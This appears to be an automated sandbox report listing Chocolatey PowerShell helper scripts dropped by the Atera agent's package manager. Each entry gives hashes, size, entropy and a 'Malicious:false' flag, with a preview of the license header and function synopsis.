                                                                                                                                                                                                                                        SHA1:D7685A3C16C53822D696EE3479451BCF1C42860A
                                                                                                                                                                                                                                        SHA-256:FDAE94594F6DDF60874760BC0E8306422681CE7C177BFA811A625AE74363CCAF
                                                                                                                                                                                                                                        SHA-512:8383D42946F02B72676BF3F6016C0CFA9355AE840320354111B8E40CD9567F46B558B4B60809BF6F0B1364A1F84E6815DC04B02D2F42078E0057F1990CCC83A3
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyInstallPackage {.. <#...SYNOPSIS..**NOTE:** Administrative Access Required.....Installs software into "Programs and Features". Use..Install-ChocolateyPackage when
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):17164
                                                                                                                                                                                                                                        Entropy (8bit):5.102467977763193
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:ctL+QG/i9AUaHrN+eNbVPoC8XdI96LMw9lpWo:ctL+jiKUW+eNbVPHMG9Gz
                                                                                                                                                                                                                                        MD5:EF3DA9AA21D97701F975F6E7EC05790D
                                                                                                                                                                                                                                        SHA1:C78F165791049FA3A17218AE2ADEECF79C628E15
                                                                                                                                                                                                                                        SHA-256:917FCEC8CA28B0EF404F565AAECF7FB850E193326D012583927CAA8BB55FB3EC
                                                                                                                                                                                                                                        SHA-512:40C18493196A1395EB72629042E0BE98F19CF657E402FF0F21447A238879157534BBCA632C40B047B42C4EA46C9935D40EF53604DCADB5552B8F6D4A5027C809
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyPackage {..<#...SYNOPSIS..**NOTE:** Administrative Access Required.....Installs software into "Programs and Features" based on a remote file..download. Use Install-
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):4341
                                                                                                                                                                                                                                        Entropy (8bit):5.172978110813656
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:cSyL+4pe90AlH31KoMb4lFkF9lr4cr8QCz7rVgAY+AExSNzwdOq7FuRFu7lVENiz:cSyL+4pGXHFKoETMcePrVnxAExSsl73
                                                                                                                                                                                                                                        MD5:B8FD2F73466C4538F16B753C1707E185
                                                                                                                                                                                                                                        SHA1:DEEAFE9F90676AC71FDC879D856A5FF312AF0D74
                                                                                                                                                                                                                                        SHA-256:1134D81094235B52249BD974129142BCE3B9796387C0D7CE71CE68A909A5C6B6
                                                                                                                                                                                                                                        SHA-512:BE6FCFB5FCBA314D4CE62FB47B3A292AADD6C7FB6723D042FC603211B7DFC20D8E2213132BA0ECF29A00050A0C7640E00FF6638EA499A2C0A33D8FBCFBC004E5
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyPath {..<#...SYNOPSIS..**NOTE:** Administrative Access Required when `-PathType 'Machine'.`....This puts a directory to the PATH environment variable......DESCRIPTI
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2645
                                                                                                                                                                                                                                        Entropy (8bit):5.278706654776255
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:48:cSyL+4pe90AlH31KoMD+4RXPXbVSPDqA9FM4jImbO2Poq+:cSyL+4pGXHFKoi7bVSe+M4jImg
                                                                                                                                                                                                                                        MD5:9432BDECB1FAE8A80B302A6216A7615B
                                                                                                                                                                                                                                        SHA1:80C6C8255413A9B9E2BD8DE14B274DFEF1F6E86A
                                                                                                                                                                                                                                        SHA-256:20510B09D631C0E5D9E6E4E5F0FC47EF47C1A413FE3F83A2413A2F4E42E1B649
                                                                                                                                                                                                                                        SHA-512:F6BF39157FB67D7434CCC6F80CF7E13C04302243BE3589D8FF85ECDEA1A19559091BA86FD7BB22671B239F16136ABC8FA84A156477497B32B35E9721EF9B7103
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyPinnedTaskBarItem {..<#...SYNOPSIS..Creates an item in the task bar linking to the provided path......NOTES..Does not work with SYSTEM, but does not error. It warns
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):9319
                                                                                                                                                                                                                                        Entropy (8bit):5.106965440646972
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:cSyL+QGXHni8ybOOeHYlqWKWXVWpRXrHoyf4yc0q1:ctL+QG3ij9e4lqZfc1
                                                                                                                                                                                                                                        MD5:D95A27860316FF9415C6E59530A4F83E
                                                                                                                                                                                                                                        SHA1:16CA9BB81AC55A4EE814915F919FCE89634D637D
                                                                                                                                                                                                                                        SHA-256:F6A1CEB186C30AAD003EAE9B71FDEF4D1DC0D989C81FFDD844C5E9B82EF9532D
                                                                                                                                                                                                                                        SHA-512:4FBE61563130EF06FC69C5FEEFAD59A6FB4DF01BCA7C289A9E8E7B3D16B06BE8BB652AAC7DBF5548BCDDB7F9EEFC2E739B707694BF18995C645F4715DD43C1D3
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyPowershellCommand {..<#...SYNOPSIS..Installs a PowerShell Script as a command.....DESCRIPTION..This will install a PowerShell script as a command on your system. Li
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):7888
                                                                                                                                                                                                                                        Entropy (8bit):5.219559860002251
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:192:cSyL+QGXH9mufXMVW7Vb944B6/yS/LIiP8/HahiJqhx8l91b:ctL+QGtmufXBVbwBPi6cJ4x8l91b
                                                                                                                                                                                                                                        MD5:B67CDEF057B2B5376CFDBE1F51AC241E
                                                                                                                                                                                                                                        SHA1:12B3484E2F85D5C591F1DDD178BA71F224BC232B
                                                                                                                                                                                                                                        SHA-256:D09B2B6B3D43259E79E6778581BA884B526D7A0687C90B19F38EF5B0CA1E5752
                                                                                                                                                                                                                                        SHA-512:BDBEC684B46B3039C7C369901C618E4D0313588B4AB3AE3A10C20CA89C9F2CFB24430FF360FA63D813B920088C7CE5DE17C20C193E0F5FBE40495A86212760FA
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyShortcut {..<#...SYNOPSIS..Creates a shortcut.....DESCRIPTION..This adds a shortcut, at the specified location, with the option to specify..a number of additional p
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):8855
                                                                                                                                                                                                                                        Entropy (8bit):5.1654657712280985
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyVsixPackage {..<#...SYNOPSIS..Downloads and installs a VSIX package for Visual Studio.....DESCRIPTION..VSIX packages are Extensions for the Visual Studio IDE. The V
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):9740
                                                                                                                                                                                                                                        Entropy (8bit):5.124129906660506
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-ChocolateyZipPackage {..<#...SYNOPSIS..Downloads file from a url and unzips it on your machine. Use..Get-ChocolateyUnzip when local or embedded file......DESCRIPTION..This wi
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2178
                                                                                                                                                                                                                                        Entropy (8bit):5.225120339484231
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Install-Vsix {..<#...SYNOPSIS..DO NOT USE. Not part of the public API......DESCRIPTION..Installs a VSIX package into a particular version of Visual Studio......NOTES..This is not par
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):4463
                                                                                                                                                                                                                                        Entropy (8bit):5.326623524611151
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Set-EnvironmentVariable {..<#...SYNOPSIS..**NOTE:** Administrative Access Required when `-Scope 'Machine'.`....DO NOT USE. Not part of the public API. Use..`Install-ChocolateyEnviron
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1711
                                                                                                                                                                                                                                        Entropy (8bit):5.130959499082034
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2011 - 2017 RealDimensions Software, LLC..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...#..# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....Function Set-PowerShellExitCode {..<#...SYNOPSIS..Sets the exit code for the PowerShell scripts......DESCRIPTION..Sets the exit code as an environment variable that is checked and used..as the exit code for the package at the end of the package script......NOTES..This tells PowerShell that it should prepare to shut down....
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with very long lines (495), with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):16063
                                                                                                                                                                                                                                        Entropy (8bit):5.071535838625921
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Start-ChocolateyProcessAsAdmin {..<#...SYNOPSIS..**NOTE:** Administrative Access Required.....Runs a process with administrative privileges. If `-ExeToRun` is not..specified, it is r
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1913
                                                                                                                                                                                                                                        Entropy (8bit):5.085202352125102
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Test-ProcessAdminRights {..<#...SYNOPSIS..Tests whether the current process is running with administrative rights......DESCRIPTION..This function checks whether the current process h
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):2897
                                                                                                                                                                                                                                        Entropy (8bit):5.162176606162476
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Uninstall-ChocolateyZipPackage {..<#...SYNOPSIS..Uninstalls a previous installed zip package, may not be necessary......DESCRIPTION..This will uninstall a zip file if installed via I
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3683
                                                                                                                                                                                                                                        Entropy (8bit):5.175198661740516
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Uninstall-BinFile {..<#...SYNOPSIS..Removes a shim (or batch redirect) for a file......DESCRIPTION..Chocolatey installs have the folder `$($env:ChocolateyInstall)\bin`..included in t
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3131
                                                                                                                                                                                                                                        Entropy (8bit):5.1027007896112115
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2011 - 2017 RealDimensions Software, LLC..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...#..# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Uninstall-ChocolateyEnvironmentVariable {..<#...SYNOPSIS..**NOTE:** Administrative Access Required when `-VariableType 'Machine'.`....Removes a persistent environment variable......DESCRIPTION..Uninstall-ChocolateyEnvironmentVariable removes an environment variable..with the specified name and value. The variable c
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):6062
                                                                                                                                                                                                                                        Entropy (8bit):5.047713257621158
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Uninstall-ChocolateyPackage {..<#...SYNOPSIS..Uninstalls software from "Programs and Features"......DESCRIPTION..This will uninstall software from your machine (in Programs and..Feat
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):3611
                                                                                                                                                                                                                                        Entropy (8bit):5.0574071891740795
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2015 - 2017 RealDimensions Software, LLC..# Copyright . 2011 - 2015 RealDimensions Software, LLC & original authors/contributors from https://github.com/chocolatey/chocolatey..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Update-SessionEnvironment {..<#...SYNOPSIS..Updates the environment variables of the current powershell session with..any environment variable changes that may have occured during a.
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1974
                                                                                                                                                                                                                                        Entropy (8bit):5.219633769893594
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:.# Copyright . 2017 - 2021 Chocolatey Software, Inc...# Copyright . 2011 - 2017 RealDimensions Software, LLC..#..# Licensed under the Apache License, Version 2.0 (the "License");..# you may not use this file except in compliance with the License...#..# You may obtain a copy of the License at..#..# http://www.apache.org/licenses/LICENSE-2.0..#..# Unless required by applicable law or agreed to in writing, software..# distributed under the License is distributed on an "AS IS" BASIS,..# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied...# See the License for the specific language governing permissions and..# limitations under the License.....function Write-FunctionCallLogMessage {..<#...SYNOPSIS..DO NOT USE. Not part of the public API......DESCRIPTION..Writes function call as a debug message......NOTES..Available in 0.10.2+.....This function is not part of the API......INPUTS..None.....OUTPUTS..None.....PARAMETER Invocation..The invocation of the function (`$My
                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe
                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):32
                                                                                                                                                                                                                                        Entropy (8bit):3.6792292966721747
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3:6rIrGlwYLVUP:/rMLVUP
                                                                                                                                                                                                                                        MD5:AA8819BA9E5AA3EA6451342287FD062A
